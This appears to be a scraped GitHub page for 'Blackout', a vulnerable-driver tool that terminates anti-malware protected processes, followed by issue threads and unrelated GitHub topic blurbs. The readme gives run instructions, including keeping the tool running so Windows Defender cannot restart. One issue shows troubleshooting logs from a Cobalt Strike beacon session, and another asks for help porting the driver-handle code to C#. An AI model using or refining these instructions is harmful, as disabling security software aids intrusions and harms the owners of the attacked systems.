kill anti-malware protected processes ( BYOVD) (Microsoft Won )
Place the driver Blackout.sys in the same path as the executable
The executable should be run in the context of an administrator
Blackout.exe -p <process_id>
for windows defender keep the program running to prevent the service from restarting it
Hello, thanks for your tool and your research,
I'm currently unable to perform the explained technique in my own lab.
Machine : Updated Windows 10
User : Administrator
Beacon : Administrator level
I have performed two tests,
Blackout -p 2416
Beacon as administrator, then getprivs, then Blackout -p 2416
From the Command Line (Windows Perspective)
c:\Users\admin\Desktop>tasklist | findstr notepad.exe
notepad.exe 2416 RDP-Tcp#1 2 17,364 K
c:\Users\admin\Desktop>whoami /priv
c:\Users\admin\Desktop>Blackout.exe -p 2416
driver path: c:\Users\admin\Desktop\Blackout.sys
Loading Blackout.sys driver ..
Service already exists.
faild to load driver ,try to run the program as administrator!!
c:\Users\admin\Desktop>
From the Cobalt Strike Beacon Perspective
[10/19 08:52:40] beacon> shell whoami /priv
[10/19 08:52:40] [*] Tasked beacon to run: whoami /priv
[10/19 08:53:04] [+] host called home, sent: 43 bytes
[10/19 08:53:04] [+] received output:
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
[10/19 08:56:50] beacon> run c:\temp\Blackout.exe -p 2416
[10/19 08:56:50] [*] Tasked beacon to run: c:\temp\Blackout.exe -p 2416
[10/19 08:57:21] [+] host called home, sent: 46 bytes
[10/19 08:57:21] [+] received output:
driver path: C:\Windows\system32\Blackout.sys
Loading Blackout.sys driver ..
Service already exists.
faild to load driver ,try to run the program as administrator!!
Any insight would be delightful.
Code execution to
HANDLE hDevice = CreateFile(L"\\\\.\\Blackout", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
GetLastError() returns error 2,Output Tips
Hello friends, I am a beginner in Windows kernel. I try to use C# to implement the same function as blackout, but it will report an error. I still cannot solve this problem after continuous testing. If possible, I hope to get your help.
this is project address: https://github.com/10cks/Gmer64
about error:
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.